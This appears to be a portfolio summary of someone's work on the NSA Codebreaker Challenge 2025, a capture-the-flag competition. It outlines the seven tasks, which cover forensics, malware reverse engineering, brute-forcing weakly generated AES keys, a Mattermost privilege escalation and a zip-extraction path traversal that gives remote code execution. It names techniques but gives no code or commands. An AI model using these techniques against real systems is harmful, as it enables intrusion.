NSA Codebreaker Challenge 2025
Multi-Stage Cybersecurity Investigation — All 7 Tasks Completed
Volatility 3 · Ghidra · Binary Ninja · Wireshark · tshark · GDB · Python
Overview
The NSA Codebreaker Challenge is an annual multi-stage cybersecurity competition run by the National Security Agency. Each task builds on the previous, requiring skills across digital forensics, network forensics, memory forensics, malware analysis, cryptanalysis, vulnerability research, and exploitation. Completing all 7 tasks places participants in a small group of top finishers nationally.
The 7 Tasks
Task 1 — Digital Forensics
Mounted and analyzed a zipped .ext2 filesystem image; analyzed bash history and system logs to identify malicious file installations and reconstruct the full attack timeline.
Task 2 — Network Forensics
Analyzed a 2344-packet PCAP using Wireshark/tshark; discovered DNS poisoning through router configuration correlation; identified malicious device IPs (127.4.1.3, 192.168.3.254, 192.168.5.1).
Task 3 — Memory Forensics
Built a custom Volatility profile using dwarf2json from a kernel image (System.map/vmlinux) for an OpenWrt router; analyzed a memory dump using Volatility and crash utilities; reverse engineered an obfuscated binary using Ghidra/Binary Ninja to reveal a base64-encoded encrypted DNS poisoning configuration not present on disk.
Task 4 — Malware Analysis
Bypassed multi-layer anti-debugging protections (ptrace checks, sigaction signal handlers, /proc/self/status parsing); extracted nested ELF from memfd; reverse engineered an obfuscated dropper; broke AES-128-ECB + RSA + RC4 encryption; recovered C2 server details and malware persistence mechanism.
Task 5 — Cryptanalysis
Identified a critical weakness in key generation (26-bit effective entropy despite 128-bit keys); performed a parallelized dual-layer AES-128-ECB brute-force attack (~67M keys, ~5 min); decrypted captured C2 traffic from PCAP; recovered the Mattermost C2 URL.
Task 6 — Vulnerability Research
Identified an authentication flaw in Mattermost bot channel creation logic; mapped the channel access graph via DFS to discover a privilege escalation path; gained access to adversary C2 infrastructure.
Task 7 — Vulnerability Exploitation
Analyzed an Android ZIP archiver; identified unsafe recursive extraction; bypassed directory constraints via filename encoding; compiled a malicious DEX JAR achieving Remote Code Execution.